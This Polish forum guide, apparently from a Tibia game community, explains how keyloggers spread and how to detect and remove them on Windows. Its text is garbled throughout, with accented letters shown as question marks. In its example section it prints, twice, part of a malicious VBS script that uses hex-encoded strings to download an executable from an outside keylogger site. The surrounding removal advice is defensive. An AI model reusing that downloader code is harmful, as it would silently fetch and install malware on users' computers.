Nowe serwery zostały otwarte 27 Paź 2025:
Idyllia (Optional PvP) 
Hostera (Open PvP) 
Dracobra (Open PvP) 
RazzorFlame
User
Witam tutejszych u?ytkownik?w, jak i naszych go?ci.
Zapewne wszed?e? (wesz?a?) tutaj bo jeste? zaniepokojony/a o swoje konto na Tibii, b?d? innej grze multiplayer lub o jakie? inne dane. W tym poradniku poka?e Ci jak skutecznie sprawdzi? czy keylogger faktycznie istnieje i dzia?a na Twoim komputerze, jak i go usun??.1) Jak dzia?a keylogger?
Keylogger to najcz??ciej aplikacja, kt?ra zapisuje wszystkie wci?ni?te klawisze przez Ciebie a nast?pnie wysy?a je (u?ywaj?c do tego internetu oczywi?cie) do kogo? kto rozsy?a ten keylogger. Zdarza?y si? bardziej inteligentne aplikacje, kt?re zapisywa?y przyciski wtedy, kiedy Tibia (lub inny program, kt?ry chcieli szpiegowa?) by?a uruchomiona. Zazwyczaj usuni?cie jednego programu szpieguj?cego nie da prawie ?adnego rezultatu. Dlaczego? Poniewa? wi?kszo?? tych aplikacji ma albo swojego klona, albo jak?? aplikacje (czasem tylko skrypt), kt?ry je?li "zobaczy", ?e program szpieguj?cy zosta? usuni?ty, ponownie ?ci?gnie go.
2) Jak wykry? keylogger?
Wykrycie keyloggera nie jest prost? rzecz?, jednak jest ono w 100% mo?liwe. Najlepiej by?oby, je?eli wcze?niej (nie maj?c ?adnego key-a) spogl?da?e? czasem w procesy (Ctrl+Shift+Esc i zak?adka procesy, na poprzednich wersjach Windowsa - Ctrl+Alt+Delete) i znasz chocia?by troszk? to co masz w??czone przy starcie systemu.
Lista aplikacji, kt?rych NIE MO?ESZ zamkn??, bo spowoduje to konieczno?? ponownego uruchomienia komputera lub uruchomienia samej aplikacji, lub jest to aplikacja bezpieczna lub systemowa:
explorer.exe
dwm.exe
winlogon.exe
wuauclt.exe
unsecapp.exe
taskmgr.exe - proces, kt?ry b?dziesz widzia? zawsze bowiem jest to mened?er zada?, kt?rym w?a?nie przegl?dasz procesy.
igfxpers.exe
igfxsrvc.exe
igfxtray.exe
hkcmd.exe
csrss.exe
svchost.exe - jest ich du?o (dopiero po ukazaniu proces?w wszystkich u?ytkownik?w). UWA?A? NA svhost.exe
Proces?w b?dzie du?o wi?cej np. na moim komputerze zazwyczaj ilo?? proces?w przekracza 50. Nie nale?y zamyka? wi?kszej ilo?ci proces?w w obawie o kradzie? konta. Je?eli masz w?tpliwo?? czy dany proces jest bezpieczny to powiniene? najpierw otworzy? lokalizacje pliku (prawy przycisk myszy otwiera menu) a nast?pnie sprawdzi? czy aplikacja znajduje si? gdzie? w folderze (lub podfolderze) Windows\System32\ wtedy jest to program systemowy (nie spotka?em si? nigdy z tym by wirus znajdowa? si? w?a?nie w tym folderze), je?eli jednak aplikacja le?y np. folderze o nazwie "temp", "Temp" b?d? np. w %AppData%\Roaming lub innym folderze do kt?rego wi?kszo?? program?w ma dost?p, i zazwyczaj taki proces nie ma opisu i ma dziwn? nazw? - wtedy mo?esz by? prawie pewny, ?e to keylogger. Powiniene? te? u?y? google, wpisa? w niego nazwe tego procesu i upewni? si? czy inni te? mieli z tym problem.
3) Przyk?ady keylogger?w
Na potrzeby tego podpunktu specjalnie ?ci?gn??em par? key-?w by pokaza? Wam, jak to dzia?a.
- - stronka, na kt?rej rzekomo znajduje si? bardzo du?a ilo?? bot?w, nawet tych, kt?re autorzy przestali rozwija? pare lat temu (np. ElfBot NG):
U?y?em tutaj programu msconfig.exe (systemowy), kt?rym sprawdzam co uruchamia si? na autostarcie. Jak wida? ostatnia opcja tmivvdcbb to skrypt (rozszerzenie .vbs) ?ci?gaj?cy keylogger, pojawi? si? dopiero po ?ci?gni?ciu programu z tej stronki. Jak doszed?em do tego ?e to w?a?nie tak dzia?a. Zobaczmy wn?trze tego pliku (tylko cz???, reszta nie wa?na):
function ximhttoskop()
dim xmlhttp
set xmlhttp=createobject(HexToString("4D53584D4C322E584D4C485454502E332E30"))
strURL = HexToString("687474703A2F2F7777772E74696269616B65796C6F676765722E636F6D2F646F776E6C6F61642F736572766572792F")&"server108.exe"
xmlhttp.Open Base64Decode("R0VU"), strURL, false
xmlhttp.Send
If xmlhttp.Status = 200 Then
Dim objStream
set objStream = CreateObject(HexToString("41444F44422E53747265616D"))
objStream.Type = 1
objStream.Open
objStream.Write xmlhttp.responseBody
objStream.SaveToFile temp,2
objStream.Close
set objStream = Nothing
End If
dim xmlhttp
set xmlhttp=createobject(HexToString("4D53584D4C322E584D4C485454502E332E30"))
strURL = HexToString("687474703A2F2F7777772E74696269616B65796C6F676765722E636F6D2F646F776E6C6F61642F736572766572792F")&"server108.exe"
xmlhttp.Open Base64Decode("R0VU"), strURL, false
xmlhttp.Send
If xmlhttp.Status = 200 Then
Dim objStream
set objStream = CreateObject(HexToString("41444F44422E53747265616D"))
objStream.Type = 1
objStream.Open
objStream.Write xmlhttp.responseBody
objStream.SaveToFile temp,2
objStream.Close
set objStream = Nothing
End If
Mo?emy zaobserwowa? tutaj, ?e strURL to jaki? link, widocznie z tego ?r?d?a pobierany jest keylogger. Ale jak to sprawdzi?? Przecie? ten link to jakie? g*wno, kt?re do linka ma tyle co ja do papie?a. No ale mo?emy zobaczy? ?e u?yto tutaj wyrazu HexToString (dla do?wiadczonych jest to funkcja dekoduj?ca). Na szcz??cie w internecie takich funkcji dekoduj?cych jest multum, a sam autor nawet nie postara? si? by u?y? ci??szego do zdekodowania szyfru. Tak wi?c po otwarciu strony: i wklejeniu do niej tego "zaszyfrowanego" tekstu otrzymamy link: "http://www.tibiakeylogger.com/download/servery/", kt?ry po doklejeniu "server108.exe" wygl?da tak: "http://www.tibiakeylogger.com/download/servery/server108.exe". Logiczne?
Zobaczmy teraz do proces?w, poniewa? w jaki? "magiczny spos?b" zaobserwowa?em tutaj kolejny program:
Nazwa: frfogjviirr.exe. Oto w?a?nie nasz keylogger.
Nie znalaz?em innego tak bezczelnego ?r?d?a keylogger?w by pokaza? inny przyk?ad. Je?eli zaobserwujesz co? ciekawego, napisz w komentarzu, ?ci?gne, rozgryze, i napisze tutaj.
4) Jak usun?? keylogger?
Powinni?my usun?? wszystkie ?r?d?a problemu. Na przyk?adzie z tibiatools.cba.pl wida? by?o, ?e mieli?my i program (frfogjviirr.exe) i skrypt (tmivvdcbb.vbs). Skrypt ?ci?ga? program je?eli on nie istnia? i go uruchamia? a ten by? w?a?nie keyloggerem.
1) Znajd? wszystkie ?r?d?a problemu: W procesach powiniene? otworzy? lokalizacje tych keylogger?w (wszystkich na raz, by p??niej nie szuka?)
2) Zamknij wszystkie keyloggery (ich procesy) w mened?erze zada?.
3) Szybko usu? te programy (foldery masz ju? otwarte od pkt. 1)
4) Przeskanuj komputer programem antywirusowym
5) Przeczy?? rejestr i inne lokalizacje programem CCleaner
6) U?yj ComboFixa
7) Odznacz niechciane programy za pomoc? msconfig.exe (je?eli takowe wpisy jeszcze istniej?, wcze?niejsze kroki powinny je usun??, jednak na wszelki wypadek SPRAWD?).
FAQ:
1) Co si? stanie je?eli tylko ?ci?gn? keylogger?
Je?eli nie uruchomi?e? ?adnej aplikacji/skryptu lub innego pliku wykonywalnego, nie masz powodu do obaw, zalecam jednak usuni?cie tego keyloggera by nie zagra?a? on w przysz?o?ci.
2) Wy??czam proces keyloggera a on momentalnie si? pojawia, co zrobi??
Sam z siebie keylogger jak i inny program nie mo?e si? uruchomi?, musisz znale?? inny program, kt?ry go w??cza i to jego najpierw wy??czy?.
3) Pr?buje usun?? keylogger jednak dostaje komunikat, ?e plik jest ju? otwarty i nie mo?na go usun??, co zrobi??
W nowszych wersjach systemu Windows powiniene? dosta? informacje w kt?rym procesie jest on otwarty, wtedy powiniene? ten proces zamkn??.
My?l?, ?e to b?dzie na tyle ode mnie. Zach?cam jeszcze raz by w komentarzach podawa? kolejne linki, w kt?rych mo?na znale?? keyloggery, z pewno?ci? je tutaj opisze. Pozdrawiam.
RazzorFlame